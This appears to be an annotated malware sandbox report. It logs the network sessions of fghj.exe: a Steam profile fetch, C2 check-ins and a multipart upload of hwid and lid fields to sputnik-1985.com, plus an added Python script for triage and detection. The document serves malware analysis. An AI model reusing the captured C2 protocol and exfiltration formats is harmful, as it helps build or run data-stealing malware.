    Data Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
    Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49826 | 104.21.96.1 | 443 | 7372 | C:\Users\user\Desktop\fghj.exe

Timestamp | Bytes transferred | Direction | Data

2025-01-10 10:47:50 UTC | 263 | OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: sputnik-1985.com

2025-01-10 10:47:50 UTC | 8 | OUT
    Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life

2025-01-10 10:47:50 UTC | 1119 | IN
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 10:47:50 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=n96br7ilcljno6m6ljkon2mj4s; expires=Tue, 06 May 2025 04:34:29 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dNb0TkmL98nUJbToZIC9rKI3mT%2F0SM1oxFChmWZJ99SpHD95E7rjFHrmiSi79MarmowKvcmHe2LxE0qTcgOhn4WD5wCTOQuE63dIQgaFfKOeHGrzD0LIkBfwwlb69StNq%2Bv"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffc175a8ccb72a4-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1963&rtt_var=746&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1457813&cwnd=212&unsent_bytes=0&cid=841b467dd1de6c87&ts=449&x=0"

2025-01-10 10:47:50 UTC | 7 | IN
    Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok  (chunked encoding: size line "2", then the payload "ok"; the CRLFs are not printed, so the body of the reply is just "ok")

2025-01-10 10:47:50 UTC | 5 | IN
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0  (terminating zero-size chunk)
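Sessions 0 to 2 show the order of events: fghj.exe fetches a Steam profile page with a browser User-Agent, then POSTs act=life to sputnik-1985.com/api and gets "ok" back, then POSTs act=recive_message with ver, lid and j fields. The following Python is an added example, not the sandbox's or the sample's code: it converts the report's "Data Raw" hex dumps back to bytes, reassembles chunked response bodies (so "2ok" reads as "ok", and a capture that ends mid-chunk is reported as truncated rather than silently accepted), and flags the two behaviours visible here. The reading of the Steam fetch as a dead-drop resolver is an inference from the event order on this page, not a statement the report makes; the action values are the two seen in the captured bodies, and the browser process list is an illustrative assumption.

```python
"""Triage of the HTTPS sessions the sandbox recorded for fghj.exe. Added example,
not part of the Joe Sandbox report: decode the report's hex dumps, reassemble
chunked bodies, and flag the Steam profile fetch and the POST /api check-ins."""
import re
from urllib.parse import parse_qs

# Assumptions: the action names are the two seen in this report, and the
# browser list is illustrative, not exhaustive.
C2_ACTIONS = {"life", "recive_message"}
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
STEAM_PROFILE_RE = re.compile(r"^/profiles/\d{17}$")      # SteamID64 = 17 digits


def hex_dump_to_bytes(dump: str) -> bytes:
    """'61 63 74 3d' -> b'act=' (the report's Data Raw format)."""
    return bytes.fromhex(dump)


def decode_chunked(data: bytes, allow_truncated: bool = False) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: '<hex size>\\r\\n<data>\\r\\n' ... '0\\r\\n\\r\\n'.
    Session 2's response is cut off in the capture, so a short chunk is either
    returned as far as it goes (allow_truncated) or rejected with ValueError."""
    out, pos = bytearray(), 0
    while True:
        nl = data.find(b"\r\n", pos)
        if nl < 0:
            if allow_truncated:
                return bytes(out)
            raise ValueError("chunk size line missing (truncated capture?)")
        size = int(data[pos:nl].split(b";")[0], 16)        # ignore chunk extensions
        pos = nl + 2
        if size == 0:
            return bytes(out)                              # last chunk; trailers ignored
        chunk = data[pos:pos + size]
        if len(chunk) < size:
            if allow_truncated:
                return bytes(out + chunk)
            raise ValueError(f"chunk truncated: expected {size} bytes, got {len(chunk)}")
        out += chunk
        pos += size + 2                                    # skip the data and its CRLF


def parse_checkin(body: str) -> dict:
    """Form body -> {'act': ..., 'ver': ..., 'lid': ..., 'j': ...} (first value each)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def triage(session: dict) -> list:
    """Human-readable findings for one captured HTTP exchange."""
    findings = []
    proc = session["process"].rsplit("\\", 1)[-1].lower()
    browser_ua = session.get("user_agent", "").startswith("Mozilla/")
    if (session["host"] == "steamcommunity.com" and session["method"] == "GET"
            and STEAM_PROFILE_RE.match(session["path"])
            and browser_ua and proc not in BROWSER_PROCESSES):
        findings.append(f"{proc}: Steam profile fetched with a browser UA by a "
                        "non-browser process (dead-drop resolver pattern)")
    if session["method"] == "POST" and session["path"] == "/api":
        fields = parse_checkin(session.get("body", ""))
        if fields.get("act") in C2_ACTIONS:
            findings.append(f"{proc}: C2-style check-in to {session['host']} "
                            f"act={fields['act']} fields={sorted(fields)}")
    return findings


# Constructed from the report's sessions 0-2: same process, hosts, paths, UA
# and request bodies (bodies taken from the Data Raw hex dumps).
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
PROC = r"C:\Users\user\Desktop\fghj.exe"
SESSIONS = [
    {"process": PROC, "host": "steamcommunity.com", "method": "GET",
     "path": "/profiles/76561199724331900", "user_agent": UA, "body": ""},
    {"process": PROC, "host": "sputnik-1985.com", "method": "POST", "path": "/api",
     "user_agent": UA, "body": hex_dump_to_bytes("61 63 74 3d 6c 69 66 65").decode()},
    {"process": PROC, "host": "sputnik-1985.com", "method": "POST", "path": "/api",
     "user_agent": UA, "body": hex_dump_to_bytes(
         "61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 "
         "26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a "
         "3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 "
         "36 34 66 35 65 61").decode()},
]
# Session 1's response body exactly as captured: chunk "2" + "ok", then the 0 chunk.
LIFE_RESPONSE = hex_dump_to_bytes("32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a")

if __name__ == "__main__":
    for i, s in enumerate(SESSIONS):
        for finding in triage(s):
            print(f"session {i}: {finding}")
    print("act=life reply:", decode_chunked(LIFE_RESPONSE))
```

`triage` keys on process identity plus destination, not on the User-Agent alone: the UA string in all three sessions is a plain Chrome 119 string and would pass any UA-based filter. The chunked decoder is what turns the report's "2ok" and "c5f..." fragments back into the bodies the sample actually received; for the session 2 reply, which the capture cuts off, call it with `allow_truncated=True` to get the partial payload.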


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49832 | 104.21.96.1 | 443 | 7372 | C:\Users\user\Desktop\fghj.exe

Timestamp | Bytes transferred | Direction | Data

2025-01-10 10:47:51 UTC | 264 | OUT
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 86
    Host: sputnik-1985.com

2025-01-10 10:47:51 UTC | 86 | OUT
    Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
    Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea  (the misspelling "recive" is in the request as sent)

2025-01-10 10:47:51 UTC | 1121 | IN
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 10:47:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=9ct2dr1in82v6fm19t72vm1473; expires=Tue, 06 May 2025 04:34:30 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMKdYxomzUDJ2OJ0vW7V7NPz11jeTCNb0zYj2UZK%2F2YBWJvCBY1%2Br2zDAbQ7WjtIQ4E6QcsFdbupO%2BMUjLl4HliaeLnxMA3gm6k8GAIL92tWN96uhBhICC2MMzUBxA5f1ixs"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8ffc17613a9c72a4-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1976&rtt_var=752&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=986&delivery_rate=1445544&cwnd=212&unsent_bytes=0&cid=8e4a9285321fd0b1&ts=492&x=0"

2025-01-10 10:47:51 UTC | 248 | IN
    Data Raw: 63 35 66 0d 0a 6f 30 32 63 6f 54 4b 43 36 52 56 76 76 4d 41 57 32 6c 74 6b 56 49 56 41 6e 46 44 46 30 4e 7a 48 57 45 44 6f 37 53 35 52 4a 61 72 59 62 2b 71 44 43 4c 62 46 4e 78 7a 5a 34 69 79 38 4f 67 67 6e 34 47 79 2b 4d 61 48 79 35 71 45 35 4c 4a 75 49 41 6e 4e 54 78 34 46 33 2b 73 42 65 38 59 77 35 54 64 6d 34 4e 4f 41 41 48 33 62 67 4c 72 35 71 35 37 57 32 70 54 6b 73 69 6f 78 46 50 6c 58 47 77 43 58 77 78 6c 72 6e 69 6e 45 4f 30 4b 31 7a 76 7a 34 46 50 75 73 70 38 54 69 6f 38 76 44 6c 50 54 72 4b 31 77 77 63 51 4e 37 43 41 50 33 53 57 61 43 55 4f 52 53 65 70 58 6a 34 59 55 59 31 34 43 4c 77 4e 71 47 37 74 4b 38 77 4a 49 75 4a 52 43 46 4d 7a 4d 73 6c 2f 73 56 62 37 59 4e 6c 41 39 71 71 65 4c 6b 30 42 58 61 70 59 76 6b 71 35 2b 72
    Data Ascii: c5fo02coTKC6RVvvMAW2ltkVIVAnFDF0NzHWEDo7S5RJarYb+qDCLbFNxzZ4iy8Oggn4Gy+MaHy5qE5LJuIAnNTx4F3+sBe8Yw5Tdm4NOAAH3bgLr5q57W2pTksioxFPlXGwCXwxlrninEO0K1zvz4FPusp8Tio8vDlPTrK1wwcQN7CAP3SWaCUORSepXj4YUY14CLwNqG7tK8wJIuJRCFMzMsl/sVb7YNlA9qqeLk0BXapYvkq5+r  (chunked encoding: the leading "c5f" is the chunk size, 0xc5f = 3167 bytes; the payload that follows is a base64-like blob, and the capture below is cut off before the chunk ends)

2025-01-10 10:47:51 UTC | 1369 | IN
    Data Raw: 2b 39 67 67 68 6d 35 35 5a 50 6c 66 4f 67 54 43 77 32 68 44 6e 68 7a 64 56 6e 71 70 34 74 6a 77 46 4f 65 41 6a 2f 69 43 6f 73 72 32 74 4d 69 61 41 67 45 4d 38 53 63 4c 47 4a 2f 66 45 58 2b 65 44 63 51 4c 64 34 6a 72 34 50 68 35 32 76 32 4c 65 49 71 53 78 71 71 67 72 59 70 58 42 56 58 4e 41 78 49 46 33 76 73 56 65 34 59 5a 33 48 39 61 70 66 37 30 72 44 54 2f 71 4c 2f 34 2f 72 62 32 39 70 54 30 6f 67 49 42 47 4e 30 72 46 78 79 2f 2b 67 78 36 67 6a 47 39 4e 68 75 4a 58 76 53 6b 42 4f 76 46 67 78 48 4b 34 2f 4b 66 6c 50 53 37 4b 31 77 77 37 51 73 76 43 4a 50 48 41 57 4f 75 5a 64 78 2f 59 72 33 47 71 50 77 4d 34 37 53 48 73 4f 4b 6d 30 76 61 77 78 4b 34 2b 49 53 48 4d 4a 69 4d 59 33 76 70 73 51 77 59 5a 38 41 64 53 31 64 50 67 6d 53 43 2b 6e 4a 66 4a 79 2f 2f
                                                                                                                                                                                                                  Data Ascii: +9gghm55ZPlfOgTCw2hDnhzdVnqp4tjwFOeAj/iCosr2tMiaAgEM8ScLGJ/fEX+eDcQLd4jr4Ph52v2LeIqSxqqgrYpXBVXNAxIF3vsVe4YZ3H9apf70rDT/qL/4/rb29pT0ogIBGN0rFxy/+gx6gjG9NhuJXvSkBOvFgxHK4/KflPS7K1ww7QsvCJPHAWOuZdx/Yr3GqPwM47SHsOKm0vawxK4+ISHMJiMY3vpsQwYZ8AdS1dPgmSC+nJfJy//
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC1369INData Raw: 59 73 54 50 53 79 73 48 6b 49 45 65 36 63 67 53 31 59 68 35 41 39 6d 30 4e 4b 64 33 48 33 62 67 4c 72 35 71 35 37 2b 32 6f 44 38 74 69 34 56 43 4e 6b 33 45 79 53 48 39 30 56 2f 6b 69 33 73 46 31 4b 39 36 76 44 45 50 50 65 77 6b 2f 6a 4f 74 38 76 44 6c 50 54 72 4b 31 77 77 48 51 4d 54 4d 49 4c 7a 32 55 2b 36 46 63 42 75 65 76 54 71 68 65 51 45 36 70 33 71 2b 50 71 36 79 74 61 38 2b 49 6f 32 43 53 54 42 41 79 38 77 6f 39 4d 31 58 35 49 64 2b 41 4e 69 69 63 37 77 38 46 44 50 75 4c 76 4a 79 36 66 4b 35 76 58 70 36 79 71 42 4c 4a 55 54 6e 77 6a 37 33 67 30 2b 75 6b 6a 63 4b 30 75 49 73 2b 44 34 44 50 75 77 6b 39 6a 4b 31 74 37 43 75 4f 79 69 4d 6a 6b 45 2f 51 63 6a 41 4c 2f 6a 50 55 4f 65 4d 5a 52 2f 62 70 47 61 79 65 55 68 32 34 44 71 2b 61 75 65 45 72 72 49
                                                                                                                                                                                                                  Data Ascii: YsTPSysHkIEe6cgS1Yh5A9m0NKd3H3bgLr5q57+2oD8ti4VCNk3EySH90V/ki3sF1K96vDEPPewk/jOt8vDlPTrK1wwHQMTMILz2U+6FcBuevTqheQE6p3q+Pq6yta8+Io2CSTBAy8wo9M1X5Id+ANiic7w8FDPuLvJy6fK5vXp6yqBLJUTnwj73g0+ukjcK0uIs+D4DPuwk9jK1t7CuOyiMjkE/QcjAL/jPUOeMZR/bpGayeUh24Dq+aueErrI
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC188INData Raw: 45 55 38 54 38 44 4f 49 50 72 4e 56 75 61 47 63 67 4c 55 73 48 79 32 4e 41 30 35 37 44 44 2b 50 36 4f 2b 75 71 30 78 4b 4d 72 42 44 44 52 66 69 4a 6c 76 79 38 35 66 34 49 68 68 54 63 48 73 62 66 67 2b 43 6e 61 2f 59 76 49 38 70 37 32 79 71 54 45 71 69 34 4e 43 4e 45 4c 42 79 53 66 73 77 6c 54 6f 69 6e 6b 43 33 36 5a 78 76 54 30 42 4d 75 45 74 76 6e 7a 6e 74 61 62 6c 59 6d 4b 6c 71 48 6c 78 5a 76 4b 42 4d 4c 44 61 45 4f 65 48 4e 31 57 65 72 6e 65 30 4d 51 6b 77 37 69 37 30 4f 36 79 2b 74 61 45 32 4b 34 2b 4a 54 54 5a 43 79 63 55 6a 39 4d 56 54 34 34 52 0d 0a
                                                                                                                                                                                                                  Data Ascii: EU8T8DOIPrNVuaGcgLUsHy2NA057DD+P6O+uq0xKMrBDDRfiJlvy85f4IhhTcHsbfg+Cna/YvI8p72yqTEqi4NCNELBySfswlToinkC36ZxvT0BMuEtvnzntablYmKlqHlxZvKBMLDaEOeHN1Werne0MQkw7i70O6y+taE2K4+JTTZCycUj9MVT44R
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC1369INData Raw: 38 34 65 0d 0a 34 41 74 62 69 4f 76 67 2b 48 6e 61 2f 59 74 73 6c 72 4c 79 34 35 53 56 73 6b 38 39 4c 50 77 65 51 67 53 50 33 78 56 62 6c 68 33 59 4c 31 71 64 38 76 44 67 41 4d 4f 51 74 2b 6a 65 6d 76 62 71 70 4e 43 69 4c 6a 6b 41 34 53 4d 50 45 62 37 43 44 56 2f 6a 4c 4c 30 33 76 6f 57 4b 76 4b 51 70 32 2b 47 7a 6e 63 71 43 2b 2f 76 31 36 49 35 69 46 52 6a 31 43 78 38 51 73 38 63 52 64 35 6f 64 39 42 4e 61 6b 65 37 45 72 42 54 72 70 4a 66 41 2b 71 62 2b 30 70 6a 64 69 78 4d 39 4c 4b 77 65 51 67 51 50 35 7a 6e 37 72 68 33 42 4e 77 65 78 74 2b 44 34 4b 64 72 39 69 38 6a 69 72 75 37 36 73 50 79 71 42 68 6b 6b 79 54 4d 33 43 4b 66 50 4d 57 66 4b 42 64 41 50 64 72 6e 69 2b 4f 41 55 6b 37 79 75 2b 66 4f 65 31 70 75 56 69 59 71 75 42 51 53 64 41 32 49 45 77 73
                                                                                                                                                                                                                  Data Ascii: 84e4AtbiOvg+Hna/YtslrLy45SVsk89LPweQgSP3xVblh3YL1qd8vDgAMOQt+jemvbqpNCiLjkA4SMPEb7CDV/jLL03voWKvKQp2+GzncqC+/v16I5iFRj1Cx8Qs8cRd5od9BNake7ErBTrpJfA+qb+0pjdixM9LKweQgQP5zn7rh3BNwext+D4Kdr9i8jiru76sPyqBhkkyTM3CKfPMWfKBdAPdrni+OAUk7yu+fOe1puViYquBQSdA2IEws
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC764INData Raw: 4d 66 77 72 64 73 44 54 32 65 51 45 75 70 33 71 2b 47 36 43 67 73 4c 56 36 50 63 53 57 44 44 52 4c 69 4a 6c 76 2b 73 6c 66 35 49 78 37 43 39 75 6b 65 62 6b 32 42 7a 62 6f 4a 76 55 37 6f 62 4f 7a 6f 44 63 6d 6d 49 56 48 50 45 76 42 7a 53 4b 2b 6a 52 44 6e 6b 7a 64 56 6e 70 4e 35 74 6a 63 42 49 4b 63 39 73 43 76 6e 74 62 4c 6c 59 6d 4b 4c 67 30 4d 77 53 4d 76 43 4c 76 54 52 51 75 79 43 66 77 6a 53 71 58 71 2b 4b 77 41 35 37 69 48 39 4f 36 43 36 73 71 38 35 4a 63 72 42 44 44 52 66 69 4a 6c 76 33 64 52 41 37 63 74 6f 51 38 66 69 63 37 52 35 58 6e 62 76 4c 2f 59 34 6f 37 57 7a 6f 6a 77 72 6d 49 5a 4a 50 55 66 4d 79 69 44 34 78 31 50 67 6d 58 45 4a 31 71 46 35 74 54 63 46 4d 71 64 73 76 6a 57 2f 38 75 62 6c 43 43 2b 45 6c 45 4d 30 56 73 4b 42 4d 4c 44 61 45 4f
                                                                                                                                                                                                                  Data Ascii: MfwrdsDT2eQEup3q+G6CgsLV6PcSWDDRLiJlv+slf5Ix7C9ukebk2BzboJvU7obOzoDcmmIVHPEvBzSK+jRDnkzdVnpN5tjcBIKc9sCvntbLlYmKLg0MwSMvCLvTRQuyCfwjSqXq+KwA57iH9O6C6sq85JcrBDDRfiJlv3dRA7ctoQ8fic7R5XnbvL/Y4o7WzojwrmIZJPUfMyiD4x1PgmXEJ1qF5tTcFMqdsvjW/8ublCC+ElEM0VsKBMLDaEO
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC1369INData Raw: 38 36 35 0d 0a 76 44 49 51 71 43 55 4f 52 53 65 70 58 6a 34 59 55 59 34 37 69 50 32 50 4b 75 36 75 72 63 36 4b 59 4f 41 54 54 78 48 79 38 41 6c 39 74 46 57 34 49 42 2f 43 74 61 6d 65 71 6f 34 43 58 61 70 59 76 6b 71 35 2b 72 2b 6c 43 77 6c 6a 59 41 4f 47 6b 44 54 77 43 58 39 79 46 79 67 6c 44 6b 55 6e 71 56 34 2b 47 46 47 4f 2b 73 76 2b 69 43 72 73 72 36 73 50 53 69 59 67 45 4d 2b 52 4d 6a 45 50 66 2f 52 58 2b 75 4f 64 41 6e 52 72 58 69 77 4d 30 5a 34 70 79 58 6d 63 76 2f 79 6b 71 59 72 4b 4d 69 6f 56 69 56 41 78 4e 41 6b 38 38 38 51 2f 38 56 75 54 64 6d 75 4e 4f 42 35 42 6a 66 71 4d 50 73 7a 72 62 69 7a 72 54 55 6e 6a 34 42 49 4e 30 7a 47 30 79 48 78 77 31 62 72 69 6e 49 4f 31 61 68 36 73 53 74 47 65 4b 63 6c 35 6e 4c 2f 38 70 53 2b 4f 79 2b 47 7a 57 49
                                                                                                                                                                                                                  Data Ascii: 865vDIQqCUORSepXj4YUY47iP2PKu6urc6KYOATTxHy8Al9tFW4IB/Ctameqo4CXapYvkq5+r+lCwljYAOGkDTwCX9yFyglDkUnqV4+GFGO+sv+iCrsr6sPSiYgEM+RMjEPf/RX+uOdAnRrXiwM0Z4pyXmcv/ykqYrKMioViVAxNAk888Q/8VuTdmuNOB5BjfqMPszrbizrTUnj4BIN0zG0yHxw1brinIO1ah6sStGeKcl5nL/8pS+Oy+GzWI
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC787INData Raw: 79 7a 77 7a 46 48 73 6a 33 34 44 31 2b 49 36 2b 44 34 65 64 72 39 69 79 43 4b 67 71 72 4f 31 65 42 43 4a 6e 6c 30 6d 53 74 6a 48 62 64 48 41 58 4f 4f 4f 63 42 32 65 76 54 71 68 65 51 45 36 70 33 71 2b 4d 71 4f 2b 76 61 49 30 4c 59 65 41 53 7a 68 49 77 73 38 39 38 63 5a 59 37 49 4e 36 48 39 53 6f 5a 72 45 77 43 7a 6a 76 4d 50 31 79 36 66 4b 35 76 58 70 36 79 72 31 47 4d 45 76 65 7a 43 43 2b 33 42 37 35 79 33 41 42 6e 76 6f 30 71 69 73 47 50 65 63 6c 38 43 43 6d 75 72 47 76 4f 69 53 42 68 55 38 36 51 38 62 49 4b 66 2f 4f 55 65 47 4c 63 67 33 58 73 48 6e 34 64 30 59 78 2f 32 4b 6d 63 70 43 2b 74 5a 51 35 4e 4d 71 51 41 69 6f 48 7a 38 31 76 70 6f 4e 52 38 6f 5a 2f 43 64 36 76 63 72 4d 34 42 7a 58 6e 49 76 30 79 6f 72 6d 78 6f 7a 30 76 67 49 5a 46 49 55 2f 4d
                                                                                                                                                                                                                  Data Ascii: yzwzFHsj34D1+I6+D4edr9iyCKgqrO1eBCJnl0mStjHbdHAXOOOcB2evTqheQE6p3q+MqO+vaI0LYeASzhIws898cZY7IN6H9SoZrEwCzjvMP1y6fK5vXp6yr1GMEvezCC+3B75y3ABnvo0qisGPecl8CCmurGvOiSBhU86Q8bIKf/OUeGLcg3XsHn4d0Yx/2KmcpC+tZQ5NMqQAioHz81vpoNR8oZ/Cd6vcrM4BzXnIv0yormxoz0vgIZFIU/M
                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC1369INData Raw: 38 30 37 0d 0a 63 34 4e 66 45 76 38 54 6d 6d 6a 49 43 4c 4e 79 4f 4a 67 51 34 43 55 63 58 52 4c 50 76 45 62 74 36 46 63 42 6e 5a 72 48 4b 34 65 55 68 32 36 47 4b 6d 43 2b 66 36 2f 70 70 30 59 70 4c 50 46 48 4e 79 79 38 38 68 2b 64 56 42 72 61 68 68 41 4e 47 70 64 66 68 33 52 6a 43 6e 65 71 35 38 35 37 61 76 35 57 4a 79 32 4e 51 5a 59 42 43 59 6b 7a 43 77 32 68 44 32 79 79 39 66 6b 4f 4a 6d 2b 47 46 47 63 65 6b 76 2f 7a 47 70 73 61 79 33 50 43 47 63 6a 41 73 4e 65 65 6e 4d 4a 50 4c 4f 58 2b 75 31 53 53 7a 54 71 58 69 31 4e 67 30 49 32 54 66 39 50 4b 6d 31 71 4c 52 36 62 4d 71 41 44 47 74 2b 69 49 6c 76 77 59 30 51 2b 4d 73 76 54 65 75 68 65 72 59 2b 45 43 65 71 41 2f 4d 35 71 37 2b 78 72 6e 70 73 79 6f 6b 4d 61 78 65 47 67 53 76 76 67 77 69 77 32 53 78 59
                                                                                                                                                                                                                  Data Ascii: 807c4NfEv8TmmjICLNyOJgQ4CUcXRLPvEbt6FcBnZrHK4eUh26GKmC+f6/pp0YpLPFHNyy88h+dVBrahhANGpdfh3RjCneq5857av5WJy2NQZYBCYkzCw2hD2yy9fkOJm+GFGcekv/zGpsay3PCGcjAsNeenMJPLOX+u1SSzTqXi1Ng0I2Tf9PKm1qLR6bMqADGt+iIlvwY0Q+MsvTeuherY+ECeqA/M5q7+xrnpsyokMaxeGgSvvgwiw2SxY


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49844 | 104.21.96.144 | 443 | 7372 | C:\Users\user\Desktop\fghj.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:47:52 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=93F28NVF3FRCC6S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12834
Host: sputnik-1985.com
2025-01-10 10:47:52 UTC | 12834 | OUT | Data Raw: 2d 2d 39 33 46 32 38 4e 56 46 33 46 52 43 43 36 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 31 46 38 45 36 31 36 33 39 43 43 39 42 37 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 39 33 46 32 38 4e 56 46 33 46 52 43 43 36 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 33 46 32 38 4e 56 46 33 46 52 43 43 36 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a
Data Ascii: --93F28NVF3FRCC6SContent-Disposition: form-data; name="hwid"BD1F8E61639CC9B7EB3EC5FED8AD62A8--93F28NVF3FRCC6SContent-Disposition: form-data; name="pid"2--93F28NVF3FRCC6SContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d
2025-01-10 10:47:53 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 10:47:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=abmn6h2r4e7thpnqv7o2s5jcvv; expires=Tue, 06 May 2025 04:34:32 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
